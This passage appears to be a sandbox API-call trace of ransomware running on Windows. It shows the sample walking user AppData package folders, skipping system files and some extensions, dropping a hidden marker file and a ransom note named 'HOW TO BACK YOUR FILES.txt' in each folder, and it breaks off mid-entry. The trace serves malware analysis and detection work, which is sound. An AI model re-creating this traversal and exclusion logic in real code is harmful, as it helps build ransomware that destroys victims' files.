[0063.034] lstrcmpiW (lpString1="container.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.034] lstrcmpiW (lpString1="container.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.034] lstrcmpiW (lpString1="container.dat", lpString2="Rabbit4444.exe") returned -1 [0063.034] lstrcmpiW (lpString1="container.dat", lpString2=".") returned 1 [0063.034] lstrcmpiW (lpString1="container.dat", lpString2="..") returned 1 [0063.034] lstrcmpiW (lpString1="container.dat", lpString2="windows") returned -1 [0063.034] lstrcmpiW (lpString1="container.dat", lpString2="bootmgr") returned 1 [0063.034] lstrcmpiW (lpString1="container.dat", lpString2="pagefile.sys") returned -1 [0063.034] lstrcmpiW (lpString1="container.dat", lpString2="boot") returned 1 [0063.034] lstrcmpiW (lpString1="container.dat", lpString2="ids.txt") returned -1 [0063.034] lstrcmpiW (lpString1="container.dat", lpString2="NTUSER.DAT") returned -1 [0063.034] lstrcpyW (in: lpString1=0x130ebee, lpString2="container.dat" | out: lpString1="container.dat") returned="container.dat" [0063.034] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\container.dat", dwFileAttributes=0x2022) returned 1 [0063.035] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\container.dat", dwFileAttributes=0x2006) returned 1 [0063.035] lstrlenW (lpString="container.dat") returned 13 [0063.035] lstrlenW (lpString="Rabbit4444") returned 10 [0063.035] lstrcmpiW (lpString1="tainer.dat", lpString2="Rabbit4444") returned 1 [0063.035] lstrlenW (lpString=".dll") returned 4 [0063.035] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0063.035] lstrlenW (lpString=".lnk") returned 4 [0063.035] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0063.035] lstrlenW (lpString=".ini") returned 4 [0063.035] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0063.035] lstrlenW (lpString=".sys") returned 4 [0063.035] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0063.035] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x88ced4a1, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x88ced4a1, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x88ced4a1, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0063.035] FindClose (in: hFindFile=0x102a90 | out: hFindFile=0x102a90) returned 1 [0063.035] lstrcpyW (in: lpString1=0x130ebee, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.035] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCookies\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\inetcookies\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.037] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.037] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.037] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.037] CloseHandle (hObject=0x2a0) returned 1 [0063.037] CloseHandle (hObject=0x298) returned 1 [0063.037] GetCurrentThreadId () returned 0xd98 [0063.037] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122148 [0063.037] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache" [0063.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e2c0 | out: hHeap=0xe0000) returned 1 [0063.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122140 | out: hHeap=0xe0000) returned 1 [0063.038] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache" [0063.038] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\" [0063.038] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0063.038] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.040] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.043] FlushFileBuffers (hFile=0x298) returned 1 [0063.044] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.044] CloseHandle (hObject=0x298) returned 1 [0063.045] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache") returned 88 [0063.045] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.045] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xfdd9a6b0, ftLastAccessTime.dwHighDateTime=0x1d39f5c, ftLastWriteTime.dwLowDateTime=0xeee5f6d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102890 [0063.045] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.045] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.045] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.045] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.045] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x41ee58e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xfdd9a6b0, ftLastAccessTime.dwHighDateTime=0x1d39f5c, ftLastWriteTime.dwLowDateTime=0xeee5f6d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.045] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.045] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.045] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.045] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.045] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.045] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeee5f6d8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeee5f6d8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeee5f6d8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.045] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.045] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.045] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x88ced4a1, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x88ced4a1, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x88ced4a1, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0063.045] lstrcmpiW (lpString1="container.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.045] lstrcmpiW (lpString1="container.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.046] lstrcmpiW (lpString1="container.dat", lpString2="Rabbit4444.exe") returned -1 [0063.046] lstrcmpiW (lpString1="container.dat", lpString2=".") returned 1 [0063.046] lstrcmpiW (lpString1="container.dat", lpString2="..") returned 1 [0063.046] lstrcmpiW (lpString1="container.dat", lpString2="windows") returned -1 [0063.046] lstrcmpiW (lpString1="container.dat", lpString2="bootmgr") returned 1 [0063.046] lstrcmpiW (lpString1="container.dat", lpString2="pagefile.sys") returned -1 [0063.046] lstrcmpiW (lpString1="container.dat", lpString2="boot") returned 1 [0063.046] lstrcmpiW (lpString1="container.dat", lpString2="ids.txt") returned -1 [0063.046] lstrcmpiW (lpString1="container.dat", lpString2="NTUSER.DAT") returned -1 [0063.046] lstrcpyW (in: lpString1=0x130ebea, lpString2="container.dat" | out: lpString1="container.dat") returned="container.dat" [0063.046] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\container.dat", dwFileAttributes=0x2022) returned 1 [0063.046] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\container.dat", dwFileAttributes=0x2006) returned 1 [0063.046] lstrlenW (lpString="container.dat") returned 13 [0063.046] lstrlenW (lpString="Rabbit4444") returned 10 [0063.046] lstrcmpiW (lpString1="tainer.dat", lpString2="Rabbit4444") returned 1 [0063.046] lstrlenW (lpString=".dll") returned 4 [0063.046] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0063.046] lstrlenW (lpString=".lnk") returned 4 [0063.046] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0063.046] lstrlenW (lpString=".ini") returned 4 [0063.047] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0063.047] lstrlenW (lpString=".sys") returned 4 [0063.047] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0063.047] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x88ced4a1, ftCreationTime.dwHighDateTime=0x1d32716, ftLastAccessTime.dwLowDateTime=0x88ced4a1, ftLastAccessTime.dwHighDateTime=0x1d32716, ftLastWriteTime.dwLowDateTime=0x88ced4a1, ftLastWriteTime.dwHighDateTime=0x1d32716, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 0 [0063.047] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0063.047] lstrcpyW (in: lpString1=0x130ebea, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0063.047] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsStore_8wekyb3d8bbwe\\AC\\INetCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowsstore_8wekyb3d8bbwe\\ac\\inetcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0063.047] CreateFileMappingW (hFile=0x298, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0063.047] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0063.048] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0063.048] CloseHandle (hObject=0x2a0) returned 1 [0063.048] CloseHandle (hObject=0x298) returned 1 [0063.048] GetCurrentThreadId () returned 0xd98 [0063.048] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1220e8 [0063.048] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe" [0063.048] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x118d38 | out: hHeap=0xe0000) returned 1 [0063.048] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1220e0 | out: hHeap=0xe0000) returned 1 [0063.048] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe" [0063.048] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\" [0063.048] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" [0063.048] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowssoundrecorder_8wekyb3d8bbwe\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x298 [0063.057] WriteFile (in: hFile=0x298, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0063.059] FlushFileBuffers (hFile=0x298) returned 1 [0063.060] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0063.060] CloseHandle (hObject=0x298) returned 1 [0063.061] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe") returned 83 [0063.061] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0063.061] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.WindowsSoundRecorder_8wekyb3d8bbwe\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6670683, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x96d8829d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeee85991, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0063.061] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.061] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.061] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0063.061] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0063.061] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6670683, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x96d8829d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xeee85991, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0063.061] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.061] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0063.061] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0063.061] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.061] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.061] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xeee85991, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xeee85991, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xeee85991, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0063.061] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.062] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0063.062] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x67c7ba3, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x391dfc11, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x391dfc11, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AC", cAlternateFileName="")) returned 1 [0063.062] lstrcmpiW (lpString1="AC", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.062] lstrcmpiW (lpString1="AC", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.062] lstrcmpiW (lpString1="AC", lpString2="Rabbit4444.exe") returned -1 [0063.062] lstrcmpiW (lpString1="AC", lpString2=".") returned 1 [0063.062] lstrcmpiW (lpString1="AC", lpString2="..") returned 1 [0063.062] lstrcmpiW (lpString1="AC", lpString2="windows") returned -1 [0063.062] lstrcmpiW (lpString1="AC", lpString2="bootmgr") returned -1 [0063.062] lstrcmpiW (lpString1="AC", lpString2="pagefile.sys") returned -1 [0063.062] lstrcmpiW (lpString1="AC", lpString2="boot") returned -1 [0063.062] lstrcmpiW (lpString1="AC", lpString2="ids.txt") returned -1 [0063.062] lstrcmpiW (lpString1="AC", lpString2="NTUSER.DAT") returned -1 [0063.062] lstrcpyW (in: lpString1=0x130ebe0, lpString2="AC" | out: lpString1="AC") returned="AC" [0063.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221a0 [0063.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xae) returned 0x1239b0 [0063.062] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1221a8 | out: ListHead=0xf68b0, ListEntry=0x1221a8) returned 0x122088 [0063.062] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x67a1999, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1c652, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x67a1999, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0063.062] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0063.062] lstrcmpiW (lpString1="AppData", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.062] lstrcmpiW (lpString1="AppData", lpString2="Rabbit4444.exe") returned -1 [0063.062] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0063.062] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0063.062] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0063.062] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0063.062] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0063.062] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0063.062] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0063.062] lstrcmpiW (lpString1="AppData", lpString2="NTUSER.DAT") returned -1 [0063.062] lstrcpyW (in: lpString1=0x130ebe0, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0063.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0063.062] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x123080 [0063.062] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x1221a8 [0063.062] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66bcb41, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1cab3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x66bcb41, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0063.063] lstrcmpiW (lpString1="LocalCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0063.063] lstrcmpiW (lpString1="LocalCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0063.063] lstrcmpiW (lpString1="LocalCache", lpString2="Rabbit4444.exe") returned -1 [0063.063] lstrcmpiW (lpString1="LocalCache", lpString2=".") returned 1 [0063.063] lstrcmpiW (lpString1="LocalCache", lpString2="..") returned 1 [0063.063] lstrcmpiW (lpString1="LocalCache", lpString2="windows") returned -1 [0063.063] lstrcmpiW (lpString1="LocalCache", lpString2="bootmgr") returned 1 [0063.063] lstrcmpiW (lpString1="LocalCache", lpString2="pagefile.sys") returned -1 [0063.063] lstrcmpiW (lpString1="LocalCache", lpString2="boot") returned 1 [0063.063] lstrcmpiW (lpString1="LocalCache", lpString2="ids.txt") returned 1 [0063.063] lstrcmpiW (lpString1="LocalCache", lpString2="NTUSER.DAT") returned -1 [0063.063] lstrcpyW (in: lpString1=0x130ebe0, lpString2="LocalCache" | out: lpString1="LocalCache") returned="LocalCache" [0063.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0063.063] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x11e2c0 [0063.063] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122228 [0063.063] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6670683, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd1c1cea1, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x6670683, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 